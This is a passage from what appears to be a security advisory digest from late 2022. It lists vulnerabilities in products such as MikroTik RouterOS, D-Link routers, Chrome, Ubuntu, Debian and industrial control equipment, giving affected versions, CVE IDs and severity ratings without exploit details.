RouterOs. The affected versions are Mikrotik RouterOs before stable v7.6.
CVE ID: CVE-2022-45315 (Critical)
An out-of-bounds read vulnerability has been discovered in the hotspot process of Mikrotik
RouterOs. The affected versions are Mikrotik RouterOs before stable v7.5.
CVE ID: CVE-2022-45313 (Critical)
An OS command injection vulnerability has been discovered in Nako3edit. The affected
versions are Nako3edit (PC Version) v3.3.74 and below.
CVE ID: CVE-2022-42496 (Critical)
An OS command injection vulnerability has been discovered in Nako3edit. The affected
versions are Nadesiko3 (PC Version) v3.3.61 and below.
CVE ID: CVE-2022-41642 (Critical)
Ubuntu has released security updates to address multiple vulnerabilities in U-Boot package.
An attacker can exploit these vulnerabilities to take control of an affected system. The
affected products are Ubuntu 22.10, Ubuntu 22.04 LTS, Ubuntu 20.04 LTS and Ubuntu 18.04 LTS.
CVE ID: CVE-2022-2347 (High), CVE-2022-30552 (Medium), CVE-2022-30790 (High),
CVE-2022-30767 (Critical), CVE-2022-33103 (High), CVE-2022-33967 (High), CVE-2022-34835
(Critical)
Dell has released a security update to resolve a Spring Framework vulnerability in Dell
NetWorker. The affected versions are NetWorker prior to 19.7.
CVE ID: CVE-2022-22950 (Medium)
Multiple OpenSSL related vulnerabilities have been discovered in Hitachi Energy's Equipment-
Network Manager Process Communication Unit PCU400 product. Security updates/mitigations are
available.
CVE ID: CVE-2022-3602 (High), CVE-2022-3786 (High)
Zyxel has released security updates to address a reflected XSS vulnerability in the CGI
program of its firewall that allow to trick a user into visiting a crafted URL with the XSS
payload.
CVE ID: CVE-2022-40603
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Intel has released security updates to address escalation of privilege, and information
disclosure vulnerabilities in Intel Server Boards BMC Firmware. An attacker can exploit
these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-40242 (High), CVE-2022-2827 (High)
Google has released Dev channel 110.0.5449.3 for Windows, and Dev channel OS version:
15263.0.0, Browser version: 110.0.5447.0 for most ChromeOS devices.
Microsoft has released Microsoft Edge Stable Channel (Version 108.0.1462.42) to resolve
multiple vulnerabilities. This update contains a fix for CVE-2022-4262, which has an exploit
in the wild.
CVE ID: CVE-2022-4262 (High), CVE-2022-41115 (Medium), CVE-2022-44688 (Medium),
CVE-2022-44708 (High)
A heap-based buffer overflow vulnerability has been discovered in GitHub repository. The
affected versions are GitHub repository vim/vim prior to 9.0.0742.
CVE ID: CVE-2022-3491 (Critical)
A command injection vulnerability via the System Checks function has been discovered in
D-Link. The affected version is D-Link DHP-W310AV 3.10EU.
CVE ID: CVE-2022-44930 (Critical)
An access control vulnerability has been discovered in D-Link that allows unauthenticated
attackers to escalate privileges via arbitrarily editing VoIP SIB profiles. The affected
version is D-Link DVG-G5402SP GE_1.03.
CVE ID: CVE-2022-44929 (Critical)
A command injection vulnerability via the Maintenance function has been discovered in
D-Link. The affected version is D-Link DVG-G5402SP GE_1.03.
CVE ID: CVE-2022-44928 (Critical)
An unauthenticated command injection vulnerability has been discovered in the product
license validation function of Telos Alliance Omnia MPX Node. The affected versions are
Telos Alliance Omnia MPX Node 1.3.* - 1.4.*.
CVE ID: CVE-2022-43325 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Telenia Software s.r.l
TVox. The affected versions are Telenia Software s.r.l TVox before v22.0.17.
CVE ID: CVE-2022-43333 (Critical)
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-46391, CVE-2020-8287 (Medium), CVE-2018-11490 (High), CVE-2019-15133
(Medium), CVE-2022-0235 (Medium), CVE-2018-16472 (High), CVE-2021-23518
(Critical)
Contec Co. has released security updates to address a cross-site scripting vulnerability in
SolarView Compact. The affected versions are SolarView Compact SV-CPT-MC310 prior to
Ver.8.02, and SV-CPT-MC310F prior to Ver.8.02.
CVE ID: CVE-2022-44355 (Medium)
Debian has released security updates to address multiple vulnerabilities in clamav, and
jhead. An attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-34055 (High), CVE-2022-41751 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Google has released Chrome 108 (108.0.5359.79) for Android, and Stable channel 108.0.5359.94
for Mac and Linux and 108.0.5359.94/.95 for Windows. This update contains a fix for
CVE-2022-4262, which has an exploit in the wild.
CVE ID: CVE-2022-4262 (High)
Remote Code Execution vulnerability has been discovered in Zenario CMS. The affected version
is Zenario CMS 9.3.57186.
CVE ID: CVE-2022-44136 (Critical)
It has been discovered that Gitea does not sanitize and escape refs in the git backend.
Arguments to git commands are mishandled. The affected versions are Gitea before 1.17.3.
CVE ID: CVE-2022-42968 (Critical)
Red Hat has released security updates to address multiple vulnerabilities in several
products.
CVE ID: CVE-2022-44620 (High), CVE-2022-44606 (High), CVE-2022-43464
(High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Google has released Stable channel 108.0.5359.75 (Platform version: 15183.59.0) for most
ChromeOS, Beta channel 109.0.5414.21 (Platform version: 15236.21.0) for most ChromeOS
devices, Chrome Dev 110 (110.0.5448.3) for Android, Dev Channel 110.0.5449.0 for Mac and
Linux, Windows, Chrome 109.0.5414.25 Beta channel for Windows, Mac and Linux, Dev channel
109.0.5414.21 (Platform version: 15236.21.0) for most ChromeOS devices, Chrome Beta 109
(109.0.5414.23) for Android, and Chrome Beta 109 (109.0.5414.25) for iOS.
CVE ID: CVE-2022-4176 (High)
Cuba ransomware actors are targeting critical sectors by exploiting an elevation of
privilege vulnerability in the Windows Common Log File System (CLFS) driver to steal system
tokens , and the ZeroLogon vulnerability to gain Domain Administrative privileges.
It has been discovered that BD's equipment- BodyGuard infusion pumps allow for access
through the RS-232 (serial) port interface. Successful exploitation can allow change in
configuration settings or disable the pump.
CVE ID: CVE-2022-43557 (Medium)
Multiple vulnerabilities have been discovered in Horner Automation's equipment- Remote
Compact Controller (RCC) 972. Successful exploitation can allow to obtain credentials of the
affected device and obtain complete control. The mitigations are available.
CVE ID: CVE-2022-2640 (High), CVE-2022-2641 (Critical), CVE-2022-2642
(High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-3859 (High), CVE-2021-3975 (Medium), CVE-2022-41316 (Medium),
CVE-2022-42898 (Medium), CVE-2021-25642 (High)
It has been discovered that a vulnerability in the use of functions of an undocumented
protocol in multiple products by Festo can lead to a complete loss of confidentiality,
integrity and availability.
CVE ID: CVE-2022-3270 (Critical)
A SQL injection vulnerability has been discovered in GitHub repository. The affected
versions are GitHub repository owncast/owncast prior to 0.0.13.
CVE ID: CVE-2022-3751 (Critical)
An unrestricted file upload vulnerability via a crafted php file has been discovered in
SolarView Compact. The affected versions are SolarView Compact 4.0 and 5.0.
CVE ID: CVE-2022-44354 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Russound XSourcePlayer.
The affected version is Russound XSourcePlayer 777D v06.08.03.
CVE ID: CVE-2022-44038 (Critical)
Grails Spring Security Core has released security updates to address a privilege escalation
vulnerability in its plugin.
CVE ID: CVE-2022-41923 (Critical)
UNIMO Technology has released a security update to address multiple vulnerabilities in its
several digital video recorders. The affected products are UDR-JA1604/UDR-JA1608/UDR-JA1616
firmware versions 71x10.1.107112.43A and earlier.
CVE ID: CVE-2022-44620 (High), CVE-2022-44606 (High), CVE-2022-43464
(High)
Ubuntu has released security updates to address a race condition vulnerability in the snapd
package that can cause privilege escalation and execution of arbitrary code. The affected
products are Ubuntu 22.10, Ubuntu 22.04 LTS, Ubuntu 20.04 LTS, Ubuntu 18.04 LTS, and Ubuntu
16.04 ESM.
CVE ID: CVE-2022-3328
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20867 (High), CVE-2022-20868 (High), CVE-2022-20922 (Medium),
CVE-2022-20943 (Medium)
Mozilla has released a security update to address a vulnerability in Thunderbird 102.5.1. An
attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-45414 (Medium)
Google Chrome has released LTS channel 102.0.5005.189 (Platform Version: 14695.155.0) for
most ChromeOS devices, dev channel 109.0.5414.25 for Windows, Mac and Linux, and Chrome Dev
109 (109.0.5414.23) for Android.
Huawei has released a security update to address an improper authorization vulnerability in
Huawei Aslan Children's Watch that allow the attacker to access certain file.
CVE ID: CVE-2022-45874 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
An arbitrary code execution vulnerability has been discovered in Badaso. The affected
version is Badaso version 2.6.3.
CVE ID: CVE-2022-41705 (Critical)
An authentication bypass vulnerability has been discovered in the WebConfig functionality of
Epson TM-C3500 and TM-C7500 devices. The affected version is for Epson TM-C3500 and TM-C7500
devices with firmware version WAM31500.
CVE ID: CVE-2022-36133 (Critical)
An improper restriction of excessive authentication attempts vulnerability has been
discovered in GitHub repository. The affected versions are GitHub repository,
wger-project/wger prior to 2.2.
CVE ID: CVE-2022-2650 (Critical)
A path traversal vulnerability has been discovered in Pilz PASvisu Server. The affected
versions are Pilz PASvisu Server before 1.12.0.
CVE ID: CVE-2022-40977 (Critical)
A vulnerability has been discovered in iTerm2 that mishandles a DECRQSS response. The
affected versions are iTerm2 before 3.4.18.
CVE ID: CVE-2022-45872 (Critical)
CODESYS has released security updates to address an inadequate encryption strength
vulnerability in CODESYS Development System V3. All CODESYS Development System V3 versions
prior to V3.5.18.40 are affected.
CVE ID: CVE-2022-4048 (High)
Multiple vulnerabilities have been discovered in Omron's Equipment- PLC CJ and CS Series.
All versions of Omron PLC CJ series, and Omron PLC CS series are affected. Mitigations are
available.
CVE ID: CVE-2019-18259 (Medium), CVE-2019-13533 (High), CVE-2019-18269
(High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2016-2775 (Medium), CVE-2016-6170 (Medium), CVE-2022-39377 (Critical),
CVE-2022-3625 (High), CVE-2022-39188 (Medium), CVE-2022-3028 (High), CVE-2022-20422 (High),
CVE-2022-42719 (High), CVE-2022-2978 (High), CVE-2022-2153 (Medium), CVE-2022-40768
(Medium), CVE-2022-29901 (Medium), CVE-2022-3635 (High), CVE-2022-41222 (High),
CVE-2022-42703 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A Cross Site Scripting (XSS) vulnerability has been discovered in Orchardproject Orchard
CMS. The affected version is Orchardproject Orchard CMS 1.10.3.
CVE ID: CVE-2022-37720 (Critical)
An OS command injection vulnerability has been discovered in Apache Airflow Pig Provider.
The affected versions are Apache Airflow Pig Provider prior to 4.0.0. Mitigation is
available.
CVE ID: CVE-2022-40189 (Critical)
A double free vulnerability has been discovered in Regexp compiler for Ruby. The affected
versions are Regexp compiler for Ruby 3.x before 3.0.4 and 3.1.x before 3.1.2.
CVE ID: CVE-2022-28738 (Critical)
Mitsubishi Electric's has released security updates to resolve Denial of Service (DoS)
vulnerability in Mitsubishi Electric's equipment- MELSEC iQ-R Ethernet Interface Module. The
affected products are MELSEC iQ-R Series products, RJ71EN71 Firmware version 65 & prior &
R04/08/16/32/120ENCPU Network Part Firmware version 65 & prior.
CVE ID: CVE-2022-40265 (High)
NVIDIA has released security updates for NVIDIA GPU Display Driver to address multiple
vulnerabilities that can lead to code execution, Denial of Service (DoS), information
disclosure, escalation of privileges, or data tampering.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Microsoft has released Microsoft Edge Stable Channel (Version 107.0.1418.62) and Microsoft
Edge Extended Stable Channel (Version 106.0.1370.86) to resolve multiple vulnerabilities.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates are
available.
CVE ID: CVE-2022-33187 (Medium), CVE-2022-42898 (Medium), CVE-2022-43933 (Medium),
CVE-2022-43934 (Medium), CVE-2022-43935 (Medium), CVE-2022-43936 (Medium)
An arbitrary code execution vulnerability has been discovered in PyTorch. The affected
versions are PyTorch before trunk/89695.
CVE ID: CVE-2022-45907 (Critical)
A Cross Site Scripting (XSS) vulnerability has been discovered in Fusiondirectory. The
affected version is Fusiondirectory 1.3.
CVE ID: CVE-2022-36180 (Critical)
An out-of-bounds read vulnerability has been discovered in the BGP daemon of FRRouting FRR
that can lead to a segmentation fault and Denial of Service (DoS). The affected versions are
FRRouting FRR before 8.4.
CVE ID: CVE-2022-37032 (Critical)
NTT DATA Corporation has released security updates to address a ClassLoader manipulation
vulnerability in TERASOLUNA Global Framework and TERASOLUNA Server Framework for Java
(Rich). The affected versions are TERASOLUNA Global Framework 1.0.0 (Public review version),
and TERASOLUNA Server Framework for Java (Rich) 2.0.0.2 to 2.0.5.1.
CVE ID: CVE-2022-43484 (Critical)
Debian has released security updates to address multiple vulnerabilities in twisted, and frr
packages. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-39348 (Medium), CVE-2022-37032 (Critical)
Moxa has released security updates to resolve an improper input validation vulnerability in
Moxa EDR and TN Series routers. Successful exploitation can cause a buffer overflow that
crashes the web service.
Debian has released security updates to address multiple vulnerabilities in
jackson-databind, and varnish. An attacker can exploit these vulnerabilities to take control
of an affected system.
CVE ID: CVE-2020-11653 (High), CVE-2022-45060 (High), CVE-2020-36518 (High),
CVE-2022-42003 (High), CVE-2022-42004 (High)
A pre-authentication buffer overflow vulnerability has been discovered in TOTOLINK LR350.
The affected version is TOTOLINK LR350 V9.3.5u.6369_B20220309.
CVE ID: CVE-2022-44255 (Critical)
A SQL Injection vulnerability has been discovered in Apartment Visitor Management System.
The affected version is Apartment Visitor Management System v1.0.
CVE ID: CVE-2022-44139 (Critical)
A command injection vulnerability has been discovered in Alarm instance management. The
affected versions are Alarm instance management below 2.0.6. Security updates are available.
CVE ID: CVE-2022-45462 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Mitel MiCollab. The
affected versions are Mitel MiCollab through 9.6.0.13.
CVE ID: CVE-2022-41326 (Critical)
Juniper Networks has released security updates to address use after free vulnerability in
the Routing Protocol Daemon (RDP) of Juniper Networks Junos OS and Junos OS Evolved that can
cause Denial of Service (DoS).
CVE ID: CVE-2022-22208 (Medium)
Omron has released security update to address use after free, out of bounds write, and
stack-based buffer overflow vulnerabilities in OMRON CX-Programmer. The affected versions
are CX-Programmer v.9.77 and earlier.
CVE ID: CVE-2022-43508 (High), CVE-2022-43509 (High), CVE-2022-43667
(High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Google has released Chrome 107 (107.0.5304.141) for Android, Extended Stable 106.0.5249.199
for Windows & Mac, and Stable channel 107.0.5304.121 for Mac & Linux and 107.0.5304.121/.122
for Windows to resolve a heap buffer overflow vulnerability.
CVE ID: CVE-2022-4135 (High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-42003 (High), CVE-2022-41323 (High), CVE-2022-31123 (High),
CVE-2021-3770 (High)
TP-Link has released security update to address an improper process of input vulnerability
in tdpServer of TP-Link RE300 V1. The affected versions are TP-Link RE300 V1 firmware prior
to 221009.
CVE ID: CVE-2022-41783 (Medium)
Improper Authentication and Improper Input Validation vulnerabilities have been discovered
in Moxa routers. Moxa has developed appropriate solutions to address these vulnerabilities.
CVE ID: CVE-2022-41758, CVE-2022-41759
Multiple vulnerabilities have been discovered in Mitsubishi Electric's Equipment- GOT2000
Series, MELSEC iQ-R/F/L Series, and MELSEC iQ-R Series. An attacker can exploit these
vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-40266 (Medium), CVE-2022-25164 (High), CVE-2022-29825 (Medium),
CVE-2022-29826 (Medium), CVE-2022-29827 (Medium), CVE-2022-29828 (Medium), CVE-2022-29829
(Medium), CVE-2022-29830 (Critical), CVE-2022-29831 (High), CVE-2022-29832 (Low),
CVE-2022-29833 (Medium)
It has been discovered that Contact Form 7 Database Addon WordPress plugin does not validate
data when output it back in a CSV file, which can lead to CSV injection. The affected
versions are Contact Form 7 Database Addon WordPress plugin before 1.2.6.5.
CVE ID: CVE-2022-3634 (Critical)
Block BYPASS vulnerability has been discovered in iQ Block Country plugin for WordPress. The
affected versions are iQ Block Country plugin 1.2.18 and below.
CVE ID: CVE-2022-41155 (Critical)
Remote code execution vulnerability has been discovered in Linaro Automated Validation
Architecture (LAVA). The affected versions are LAVA before 2022.11.1.
CVE ID: CVE-2022-45132 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-3550 (High), CVE-2022-3551 (Medium), CVE-2022-43680 (High),
CVE-2017-12618 (Medium)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20961 (High), CVE-2022-3602 (High), CVE-2022-3786 (High),
CVE-2022-20963 (Medium), CVE-2022-20962 (Medium)
Dell has released security updates to resolve multiple vulnerabilities in Dell Cloud Tiering
Appliance (CTA). All versions of CTA 13.1 and CTA 13.2 are affected.
Huawei has released security updates to address improper input validation, and insufficient
authentication vulnerabilities in Huawei Aslan Children's Watch, and Huawei band products
respectively.
CVE ID: CVE-2022-39012 (High), CVE-2022-41579 (High)
Foxit has released an updated Foxit PDF Editor for Mac 11.1.4, to resolve multiple
vulnerabilities in Foxit PDF Editor for Mac 11.1.3.0920 and earlier for macOS.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Debian has released a security update to resolve multiple parsing error vulnerability in the
mp4 module of Nginx, which can result in denial of service, memory disclosure or execution
of arbitrary code when processing a malformed mp4 file.
CVE ID: CVE-2021-3618 (High), CVE-2022-41741 (High), CVE-2022-41742
(High)
It has been discovered that BIG-IP and BIG-IQ of F5 are vulnerable to cross-site request
forgery (CSRF) attacks through iControl SOAP.
CVE ID: CVE-2022-41622 (High)
Zyxel has released security update to address a pre-configured password vulnerability in its
LTE indoor router LTE3301-M209. The affected versions are LTE3301-M209 V1.00(ABLG.4)C0 and
earlier.
CVE ID: CVE-2022-40602
A Cross Site Scripting (XSS) vulnerability has been discovered in Beekeeper Studio that
allows to execute arbitrary web scripts or HTML via a crafted payload injected into the
error modal container. The affected version is Beekeeper Studio v3.6.6.
CVE ID: CVE-2022-43143 (Critical)
An use-after-free vulnerability has been discovered in drachtio-server. The affected version
is drachtio-server 0.8.18.
CVE ID: CVE-2022-45474 (Critical)
A vulnerability has been discovered in DLINK router that can inject a command through an
interface that can run with ROOT permissions on the router.
CVE ID: CVE-2022-36786 (Critical)
It has been discovered that a vulnerability in Pillow allows to delete files because spaces
in temporary pathnames are mishandled. The affected versions are Pillow before 9.0.1.
CVE ID: CVE-2022-24303 (Critical)
AVEVA has released a security update to address multiple vulnerabilities in its Edge
equipment. Successful exploitation of these vulnerabilities can allow an attacker to insert
malicious DLL files and trick the application into executing code. The affected versions are
AVEVA Edge 2020 R2 SP1, AVEVA Edge 2020 R2 SP1 w/ HF 2020.2.00.40, and AVEVA Edge 2020 R2
and all prior versions.
CVE ID: CVE-2016-2542 (High), CVE-2021-42794 (Medium), CVE-2021-42796 (Critical),
CVE-2021-42797 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE ID: CVE-2022-39377 (Critical), CVE-2022-39316 (High), CVE-2022-39283
(High), CVE-2022-39317, CVE-2022-39282 (High), CVE-2022-39347(High), CVE-2022-39318 (High),
CVE-2022-39320, CVE-2022-39319 (Critical)
Poenix Contact has releasedh a security update to address improper restriction of operations
within the bounds of a memory buffer, and out-of-bounds read vulnerabilities in its
Automation Worx Software Suite equipment. The affected components of Automation Worx
Software Suit are Config+ versions 1.89 and prior, PC Worx versions 1.89 and prior and PC
Worx Express versions 1.89 and prior.
CVE ID: CVE-2022-3461 (High), CVE-2022-3737 (High)
Multiple vulnerabilities have been discovered in GE's equipment- CIMPLICITY that can crash
the device being accessed or allow arbitrary code execution. The affected versions are
CIMPLICITY versions 2022 and prior.
CVE ID: CVE-2022-3084 (High), CVE-2022-2952 (High), CVE-2022-2948 (High),
CVE-2022-2002 (High), CVE-2022-3092 (High)
Multiple Cross Site Scripting (XSS) vulnerabilities have been discovered in Digital Alert
Systems equipment- DASDEC. Successful exploitation can result in false alerts being issued
to broadcast or cable sites that are immediately connected to the compromised system.
CVE ID: CVE-2019-18265 (Medium), CVE-2022-40204 (Medium)
Moxa has released security updates to resolve an improper privilege management vulnerability
in its Arm-based Computer- UC and DA Series, and AIG-300 Series.
CVE ID: CVE-2022-3088 (High)
Moodle has released security updates to address multiple vulnerabilities in several
products.
CVE ID: CVE-2022-45152, CVE-2022-45151, CVE-2022-45150, CVE-2022-45149,
CVE-2021-23414
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-35737 (High), CVE-2022-2929 (Medium), CVE-2022-2928 (High),
CVE-2017-6888 (Medium), CVE-2020-0499 (Medium), CVE-2021-0561 (Medium), CVE-2022-39260
(High), CVE-2022-39253 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
An insufficient session expiration vulnerability has been discovered in GitHub repository.
The affected versions are GitHub repository librenms/librenms prior to 22.10.0.
CVE ID: CVE-2022-4070 (Critical)
An arbitrary system commands execution vulnerability has been discovered in BACKCLICK
Professional. The affected version is BACKCLICK Professional 5.9.63.
CVE ID: CVE-2022-44000 (Critical)
A heap based buffer overflow vulnerability has been discovered in the HTTP server
functionality of Micrium uC-HTTP that allows Remote Code Execution (RCE) via HTTP request.
The affected version is Micrium uC-HTTP 3.01.01.
CVE ID: CVE-2022-24942 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Roxy Fileman. The
affected version is Roxy Fileman 1.4.6.
CVE ID: CVE-2022-40797 (Critical)
Cradlepoint has released a security update to address a command injection vulnerability in
its IBR600. The affected versions are Cradlepoint IBR600 NetCloud OS (NCOS) 6.5.0.160bc2e
and prior.
CVE ID: CVE-2022-3086 (High)
Palo Alto Networks has released security updates to resolve a local privilege escalation
vulnerability in Palo Alto Networks Cortex XSOAR engine software running on a Linux
operating system.
CVE ID: CVE-2022-0031 (High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates are
available.
CVE ID: CVE-2022-21831 (Critical), CVE-2022-22577 (Medium), CVE-2022-40664
(Critical), CVE-2022-42004 (High), CVE-2022-43680 (High)
A vulnerability has been discovered in Atlassian Crowd that allows to authenticate as the
crowd application via security misconfiguration and subsequent ability to call privileged
endpoints in Crowd's REST API under the {{usermanagement}} path. The affected products are
Atlassian Crowd versions 3.x.x, versions 4.x.x before version 4.4.4, and versions 5.x.x
before 5.0.3.
CVE ID: CVE-2022-43782 (Critical)
A command injection vulnerability has been discovered in Bitbucket Server and Data Center
that allows execution of arbitrary code on the affected system.
CVE ID: CVE-2022-43781 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in BACKCLICK Professional.
The affected version is BACKCLICK Professional 5.9.63.
CVE ID: CVE-2022-44006 (Critical)
Hive ransomware functions as a Ransomware-as-a-Service (RaaS) is exploiting Microsoft
Exchange Server vulnerabilities to gain initial access to compromise systems of businesses
and critical infrastructure sectors, including government facilities, communications sector,
critical manufacturing, Information Technology (IT), and especially Healthcare and Public
Health (HPH).
CVE ID: CVE-2021-31207(High), CVE-2021-34473 (Critical),
CVE-2021-34523(Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Red Lion Controls has released security updates to address a path traversal vulnerability in
its Crimson equipment. The affected versions are Crimson 3.0 version 707.000 and prior,
Crimson 3.1 version 3126.001 and prior, and Crimson 3.2 version 3.2.0044.0 and prior.
CVE ID: CVE-2022-3090 (High)
Mitsubishi Electric has released security updates to resolve a malicious code execution
vulnerability in multiple software products.
CVE ID: CVE-2020-14521
Six Apart has released security updates to resolve multiple vulnerabilities in Movable Type
several versions.
CVE ID: CVE-2022-45113, CVE-2022-45122, CVE-2022-43660
It has been discovered that Netatalk version 3.1.12, contains multiple error and memory
management vulnerabilities that can cause Remote Code Execution (RCE) as well as
out-of-bounds read.
CVE ID: CVE-2022-0194, CVE-2022-23121, CVE-2022-23122, CVE-2022-23123,
CVE-2022-23124, CVE-2022-23125
A SQL injection vulnerability via the password parameter has been discovered in Human
Resource Management System v1.0.
CVE ID: CVE-2022-43262 (Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities have been discovered in Cisco Identity Services Engine (ISE) that
can allow injection of arbitrary operating system commands, bypass security protections, and
conduct Cross Site Scripting (XSS) attacks.
CVE ID: CVE-2022-20964, CVE-2022-20965, CVE-2022-20966, CVE-2022-20967
Sophos has released security updates to resolve an XML External Entity (XEE/XXE)
vulnerability in Sophos Mobile managed on-premises that allows Server-Side Request Forgery
(SSRF) and potential code execution.
CVE ID: CVE-2022-3980 (Critical)
Multiple vulnerabilities have been discovered in Hitachi Energy's Equipment- MicroSCADA
Pro/X SYS600, and IED Connectivity Packages and PCM600 products. Security
updates/mitigations are available.
CVE ID: CVE-2022-3388 (High), CVE-2022-2513 (High)
Debian has released a security update to resolve several vulnerabilities in Mozilla Firefox
ESR package.
CVE ID: CVE-2022-45403, CVE-2022-45404, CVE-2022-45405, CVE-2022-45406,
CVE-2022-45408, CVE-2022-45409, CVE-2022-45410, CVE-2022-45411, CVE-2022-45412,
CVE-2022-45416, CVE-2022-45418, CVE-2022-45420, CVE-2022-45421
Dell has released security updates to resolve multiple vulnerabilities in its products. The
affected products are Dell Integrated System for Microsoft Azure Stack Hub versions before
2210 , Dell Command | Update versions before 4.7.0 and Dell Update /Alienware Update
versions before 4.7.0.
PHOENIX CONTACT has released a security update to resolve Denial of Service (DoS)
vulnerability in PHOENIX CONTACT FL MGUARD and TC MGUARD devices.
CVE ID: CVE-2022-3480
PHOENIX CONTACT has released security update to resolve automationworx BCP File Parsing
Vulnerability in Config+, PC Worx & PC Worx Express products that can lead to a heap buffer
overflow, release of unallocated memory or a read access violation due to insufficient
validation of input data.
CVE ID: CVE-2022-3461(High), CVE-2022-3737(High)
Mozilla has released updated Thunderbird 102.5, Firefox ESR 102.5 and Firefox 107 to resolve
multiple vulnerabilities. An attacker can exploit these vulnerabilities to take control of
an affected system.
CVE ID: CVE-2022-45403, CVE-2022-45404, CVE-2022-45405, CVE-2022-45406,
CVE-2022-45407,CVE-2022-45408, CVE-2022-45409, CVE-2022-45410, CVE-2022-45411,
CVE-2022-45412, CVE-2022-45413, CVE-2022-45415, CVE-2022-45416, CVE-2022-45417,
CVE-2022-45418, CVE-2022-45419, CVE-2022-45420, CVE-2022-45421, CVE-2022-40674
Ubuntu has released security updates to resolve multiple vulnerabilities in several
products.
CVE ID: CVE-2022-40023, CVE-2020-16845, CVE-2022-41741, CVE-2022-41742
Debian has released a security update to resolve several vulnerabilities in Wordpress
package that allow SQL injection, create open redirects, bypass authorization access, or
perform Cross-Site Request Forgery (CSRF) or Cross-Site Scripting (XSS) attacks.
Debian has released a security update to resolve several vulnerabilities in GRUB2 package
which can result in crashes and potentially execution of arbitrary code.
CVE ID: CVE-2022-2601, CVE-2022-3775
Debian has released a security update to resolve parsing errors in the mp4 module of Nginx
package which can result in Denial of Service (DoS), memory disclosure or potentially the
execution of arbitrary code when processing a malformed mp4 file.
CVE ID: CVE-2022-41741, CVE-2022-41742.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities have been discovered in several Jenkins Plugins. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Dell has released security updates to resolve multiple vulnerabilities in the PowerPath
Management Appliance.
CVE ID: CVE-2022-34446, CVE-2022-34447, CVE-2022-34448, CVE-2022-34449,
CVE-2022-34450, CVE-2022-34451, CVE-2022-34452
Multiple vulnerabilities have been discovered in several Zoom products. The affected
products are Zoom Rooms Installer for Windows before version 5.12.6, Zoom Client for
Meetings Installer for macOS (Standard and for IT Admin) before version 5.12.6, Zoom Client
for Meetings for Windows (32-bit) prior to 5.12.6, Zoom VDI Windows Meeting Client for
Windows (32-bit) prior to 5.12.6 and Zoom Rooms for Conference Room for Windows (32-bit)
prior to 5.12.6
CVE ID: CVE-2022-28766, CVE-2022-28768, CVE-2022-36924
ABB has released a security update to resolve cleartext credentials vulnerability in ABB
protection and control IED manager PCM600. The affected versions are PCM600 2.11 and
previous versions, including hotfixes prior to 20220923.
CVE ID: CVE-2022-2513
It has been discovered that Samba's Kerberos libraries and AD DC fail to guard against
integer overflows when parsing a PAC on a 32-bit system. Successful exploitations with a
forged PAC can corrupt the heap. The affected products are all versions of Samba prior to
4.15.12, 4.16.7, 4.17.3.
CVE ID: CVE-2022-42898
A realtek chip deadlock vulnerability has been discovered in multiple consumer electronics
products provided by Mitsubishi Electric Corporation when processing Wi-Fi connection using
the access point mode.
